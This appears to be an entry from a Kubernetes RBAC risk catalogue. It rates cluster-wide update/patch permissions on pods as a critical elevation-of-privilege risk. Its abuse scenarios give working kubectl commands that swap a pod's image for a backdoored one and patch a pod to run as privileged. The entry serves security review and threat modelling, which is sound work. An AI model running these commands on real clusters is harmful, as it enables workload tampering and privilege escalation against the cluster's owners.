Update/Patch pods cluster-wide
Elevation of Privilege
Critical
Overview
| Field | Value |
|---|---|
| ID | 1008 |
| Name | Update/Patch pods cluster-wide |
| Risk Category | Elevation of Privilege |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | core |
| Resources | pods |
| Verbs | update, patch |
| Tags | PrivilegeEscalation Tampering WorkloadExecution |
Description
Permits modifying existing pods in any namespace across the cluster. This is critical as an attacker can alter a pod’s specification to grant it elevated privileges (e.g., change image, add privileged security context, mount sensitive host paths), leading to code execution, privilege escalation, and tampering with running workloads.
Abuse Scenarios
- Patch a running pod to change its container image to a malicious one.
kubectl set image pod/<pod-name> <container-name>=<malicious-image> -n <namespace>
# Example: kubectl set image pod/nginx-deployment-xyz nginx=malicious/nginx-backdoor -n default
- Patch a running pod to add a privileged security context (if not blocked by PSP/PSA).
kubectl patch pod <pod-name> -n <namespace> --type='json' -p='[{"op": "add", "path": "/spec/containers/0/securityContext", "value": {"privileged": true}}]'
# Example: kubectl patch pod my-app-pod -n production --type='json' -p='[{"op": "add", "path": "/spec/containers/0/securityContext", "value": {"privileged": true}}]'